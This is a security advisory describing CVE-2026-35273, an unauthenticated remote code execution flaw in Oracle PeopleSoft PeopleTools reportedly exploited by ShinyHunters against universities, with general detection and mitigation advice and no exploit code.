CVE-2026-35273 Oracle PeopleSoft Zero-Day RCE

Oracle's PeopleSoft PeopleTools is affected by CVE-2026-35273, a critical zero-day Remote Code Execution (RCE) vulnerability that is currently being actively exploited in the wild by the cybercrime group ShinyHunters. This flaw allows unauthenticated attackers to gain full control over affected servers. While Oracle has not yet released a CVSS score for CVE-2026-35273, its nature as an unauthenticated RCE zero-day indicates maximum severity.

The exploitation campaign, first identified by Mandiant and Google Threat Intelligence Group, commenced no later than May 27, 2026. It primarily targets organizations in the higher education sector, with over 100 entities potentially compromised. This widespread activity has led to significant data theft and subsequent extortion demands, showing the immediate and severe risk posed by this vulnerability.

Oracle acknowledged the vulnerability and provided preliminary mitigation advice on June 12, 2026, several weeks after initial exploitation was detected. As of this report, a definitive patch to remediate CVE-2026-35273 remains unavailable. Organizations utilizing Oracle PeopleSoft PeopleTools are urged to implement all available mitigations and enhance monitoring to detect and respond to potential exploitation attempts.

What is CVE-2026-35273 and why is it critical?

CVE-2026-35273 is an unauthenticated Remote Code Execution (RCE) vulnerability present in Oracle PeopleSoft PeopleTools, which is currently under active exploitation by the ShinyHunters cybercrime group. This defect permits an attacker to execute arbitrary code on a vulnerable server without needing any prior authentication.

CVE-2026-35273 is critical for several reasons. Firstly, RCE vulnerabilities are among the most severe, as they grant attackers the ability to run malicious code directly on a target system. This can lead to complete compromise of the server, including data exfiltration, system modification, or the establishment of persistent access. Secondly, the vulnerability is unauthenticated, meaning an attacker does not require valid credentials or session tokens to initiate the exploit. This significantly broadens the attack surface, allowing any threat actor with network access to a vulnerable instance to attempt exploitation.

Thirdly, CVE-2026-35273 is a zero-day vulnerability, indicating that a fix from Oracle was not publicly available when exploitation began. This status leaves affected organizations exposed without an immediate patching solution, forcing reliance on mitigations that may not fully prevent exploitation. Oracle PeopleSoft PeopleTools provides core functionality for critical enterprise applications, including Human Resources (HR) and Customer Relationship Management (CRM). The compromise of systems hosting such data can have far-reaching consequences, impacting sensitive employee, student, and customer information.

Impact and Risks Associated with CVE-2026-35273

Attackers exploiting CVE-2026-35273 can achieve unauthenticated remote code execution, leading directly to server takeover, full data exfiltration, and subsequent extortion attempts against victim organizations. The direct impact is the compromise of the underlying PeopleSoft server, enabling adversaries to access, steal, or manipulate sensitive information stored or processed by the system.

Organizations using Oracle PeopleSoft PeopleTools are at risk, with a pronounced targeting of the higher education sector. Google and Mandiant intelligence indicates that 68% of the potential victim pool for this campaign comprises educational institutions, predominantly located in the United States. This specific targeting may be indicative of the prevalence of exposed PeopleSoft instances within this sector, or the perceived value of the data held by these entities.

The nature of the data typically managed by Oracle PeopleSoft applications, such as student records, staff payroll information, human resources databases, and customer details, makes it highly valuable to threat actors. ShinyHunters, a financially motivated cybercrime group, specializes in data theft and subsequent extortion. Their modus operandi involves exfiltrating large volumes of sensitive data and then threatening to publish it publicly unless a ransom is paid. The University of Nottingham confirmed a significant amount of student data was stolen during a cyberattack linked to this campaign, with ShinyHunters subsequently leaking portions of the school's data.

The real-world reach of this campaign is substantial, with Mandiant and Google alerting more than 100 organizations to potentially vulnerable endpoints. The ongoing nature of the campaign, with ShinyHunters actively sending extortion demands as recently as June 12, 2026, indicates a sustained and evolving threat. Beyond Google's immediate visibility, additional victims may be impacted, broadening the overall scope of the incident. The financial and reputational ramifications for compromised organizations are severe, encompassing potential regulatory fines, legal liabilities, reputational damage, and loss of trust among constituents.

Exploitation Chain and Threat Actor Activity

The exploitation of CVE-2026-35273 involves unauthenticated attackers using a critical defect in Oracle PeopleSoft PeopleTools to gain remote code execution, with initial observed activity dating back to at least May 27, 2026. This attack vector allows adversaries to execute malicious code on target systems without needing any valid credentials, significantly simplifying the initial access phase. The primary precondition for exploitation is a publicly accessible Oracle PeopleSoft PeopleTools instance connected to the internet.

The threat actor behind this ongoing campaign is ShinyHunters, a notorious cybercrime group recognized for its focus on data theft and extortion. The group's operational pattern typically involves identifying vulnerable systems, exploiting them to gain unauthorized access, exfiltrating large quantities of sensitive data, and then publicly exposing or threatening to expose this data as a means of coercing victims into paying a ransom. This activity aligns with previous campaigns by ShinyHunters targeting Oracle products, an area of focus for the group as extensively documented in our analysis of ShinyHunters' Oracle PeopleSoft zero-day operations.

The timeline of this exploitation event shows a significant period during which organizations were vulnerable without a vendor-supplied patch. Exploitation commenced at least by May 27, 2026. Oracle formally disclosed the vulnerability and provided mitigation steps on June 12, 2026, approximately two weeks after the attacks began. This gap demonstrates the challenges posed by zero-day threats, where active exploitation can precede public disclosure and the availability of official fixes. Our team has previously reported on aspects of this vulnerability, for instance, in our analysis of Oracle PeopleSoft CVE-2026-35273 RCE.

ShinyHunters has been observed stealing data, naming victims, and publishing allegedly stolen information. The University of Nottingham's confirmation of a data security incident and the subsequent leak of student data by ShinyHunters serves as a concrete example of the group's operational tactics. This public shaming and data exposure tactic is a common element of their extortion model, increasing pressure on victims to comply with ransom demands. The group's activities, including data exfiltration and subsequent extortion, mirror those observed in other high-profile incidents involving Oracle products, such as those covered in our report on ShinyHunters and Oracle PeopleSoft CVE-2026-35273.

Which products and versions are affected by CVE-2026-35273?

CVE-2026-35273 specifically impacts Oracle PeopleSoft PeopleTools. While Oracle has confirmed the vulnerability within this product line, specific affected versions have not been publicly detailed by the vendor at the time of this report. This implies that organizations running any version of Oracle PeopleSoft PeopleTools should consider their installations potentially vulnerable until further specific guidance or patches are released.

The broad nature of "PeopleSoft PeopleTools" as a product suite suggests that the vulnerability may reside in a core component common across various deployments, regardless of the specific PeopleSoft application (e.g., HR, CRM) being used.

The lack of precise version numbers for affected software typically means that a wide range of deployments could be susceptible. Therefore, administrators should assume that all publicly exposed instances of Oracle PeopleSoft PeopleTools are at risk and prioritize applying any forthcoming patches or implementing all recommended mitigations.

Detection Strategies for CVE-2026-35273 Exploitation

Detecting exploitation of CVE-2026-35273 requires vigilant and proactive monitoring of Oracle PeopleSoft PeopleTools environments for anomalous process execution, unusual network activity, and indicators of data staging or exfiltration. Given the unauthenticated RCE nature of the vulnerability, initial compromise involves direct execution of malicious payloads, not traditional authentication failures.

Organizations should implement full logging and monitoring across their PeopleSoft infrastructure, focusing on both application and operating system layers. Key detection strategies include:

  • Log Analysis:
  • Web Server Logs: Monitor for unusual or malformed HTTP requests targeting PeopleSoft PeopleTools endpoints, especially those that deviate from normal user or application behavior. Look for requests with suspicious payloads or long, encoded parameters.
  • Application Logs: Scrutinize PeopleSoft application logs for errors, unexpected behavior, or unauthorized administrative actions that may indicate a compromise.
  • Operating System Event Logs: Look for suspicious process creation by the PeopleSoft service account or related processes (e.g., cmd.exe, powershell.exe, wscript.exe) that deviate from baseline activity. Pay attention to unexpected child processes, especially those attempting to execute shell commands or interact with system utilities.
  • Authentication Logs: While exploitation is unauthenticated, post-exploitation activity may involve attempts to create new user accounts or modify existing ones, which would be visible in authentication logs.
  • Endpoint Detection and Response (EDR) Queries:
  • Process Monitoring: Create EDR rules to detect anomalous process execution originating from the PeopleSoft application's process ID (PID). Look for processes spawning from the main PeopleSoft application server process that are not typical for its operation.
  • File System Monitoring: Monitor critical PeopleSoft directories and files for unauthorized modifications, creation of new executable files, or staging of exfiltrated data.
  • Network Connections: Identify outbound network connections initiated by PeopleSoft processes to unusual or external IP addresses, especially those commonly associated with command-and-control (C2) infrastructure or data exfiltration points.
  • Registry/Configuration Changes: Monitor for suspicious modifications to system registry keys or configuration files that could establish persistence or alter system behavior.
  • Network Traffic Analysis:
  • Traffic Anomalies: Baseline normal network traffic patterns to and from PeopleSoft PeopleTools servers. Look for sudden spikes in outbound data transfer, particularly to suspicious external destinations.
  • Protocol Deviations: Identify the use of unusual protocols or non-standard ports by PeopleSoft servers.
  • Known IOCs: While specific Indicators of Compromise (IOCs) for CVE-2026-35273 exploitation by ShinyHunters have not been publicly released, organizations should continuously integrate and scan for any emerging IOCs from trusted threat intelligence feeds related to ShinyHunters or similar data exfiltration campaigns.
  • File Integrity Monitoring (FIM):
  • Implement FIM solutions on PeopleSoft servers to detect unauthorized changes to critical system files, application binaries, and configuration files.

Regular auditing of security configurations, user accounts, and access permissions within the PeopleSoft environment can also help identify post-exploitation lateral movement or privilege escalation attempts.

Remediation and Mitigation for CVE-2026-35273

As of June 12, 2026, Oracle has not released an official patch to fully remediate CVE-2026-35273. However, the vendor has provided mitigation steps that organizations should implement immediately to reduce their exposure to active exploitation. Given the severe nature of this zero-day unauthenticated RCE, proactive and stringent mitigation is important.

Remediation and mitigation efforts should prioritize limiting exposure and monitoring for signs of compromise:

  • Apply Patches Immediately (When Available):
  • Monitor Oracle's official security advisories and patch releases closely. As soon as a patch for CVE-2026-35273 becomes available, organizations must plan and execute its deployment without delay across all affected Oracle PeopleSoft PeopleTools instances. Prioritize critical or publicly exposed systems.
  • Implement Oracle's Recommended Mitigations:
  • While specific details of Oracle's recommended mitigations were not provided in the initial disclosure, general best practices for protecting against unauthenticated RCE in web-facing applications include:
  • Restrict Network Access: Limit network access to PeopleSoft PeopleTools instances from the internet to only essential IP ranges or trusted networks. Utilize firewalls to enforce strict inbound and outbound access control lists (ACLs). Consider placing PeopleSoft servers behind a VPN or bastion host for administrative access.
  • Network Segmentation: Isolate PeopleSoft application servers and databases from other critical internal systems through network segmentation. This limits an attacker's ability to move laterally within the network post-exploitation.
  • Web Application Firewall (WAF): Deploy and properly configure a WAF in front of PeopleSoft PeopleTools instances. A WAF can help detect and block malicious requests, including those attempting to exploit CVE-2026-35273, by filtering for known attack patterns or anomalies in traffic.
  • Least Privilege: Ensure that the PeopleSoft application and its underlying services run with the absolute minimum necessary privileges on the operating system.
  • Disable Unused Functionality: Review and disable any PeopleSoft PeopleTools components, services, or features that are not strictly required for business operations.
  • Secure Configuration Review: Conduct a thorough review of all PeopleSoft and underlying server configurations to ensure they adhere to security best practices and hardened standards.
  • Enhanced Monitoring and Incident Response:
  • Given the active exploitation, organizations must enhance their monitoring capabilities as detailed in the detection section. This includes rigorous log analysis, EDR monitoring, and network traffic inspection for any indicators of compromise.
  • Develop and rehearse incident response plans specifically for a potential PeopleSoft compromise. This includes procedures for isolating affected systems, forensic analysis, data recovery, and stakeholder communication.
  • Conduct regular security audits and vulnerability assessments of PeopleSoft deployments to identify and address other potential weaknesses.

The absence of an immediate patch increases the importance of strong mitigations and continuous monitoring. Organizations should operate under the assumption that their publicly exposed PeopleSoft instances are targets and prepare for potential breaches.

Technical Takeaways

  • CVE-2026-35273 is an unauthenticated Remote Code Execution (RCE) zero-day vulnerability affecting Oracle PeopleSoft PeopleTools.
  • The ShinyHunters cybercrime group is actively exploiting this flaw, with observed activity dating back to at least May 27, 2026.
  • The primary targets are organizations in the higher education sector, particularly in the United States, leading to data theft and extortion.
  • Oracle disclosed the vulnerability and recommended mitigations on June 12, 2026, but has not yet released a patch, leaving systems exposed.
  • Immediate implementation of network access restrictions, strong logging, and enhanced monitoring for anomalous activity on PeopleSoft PeopleTools instances is critical to mitigate risk.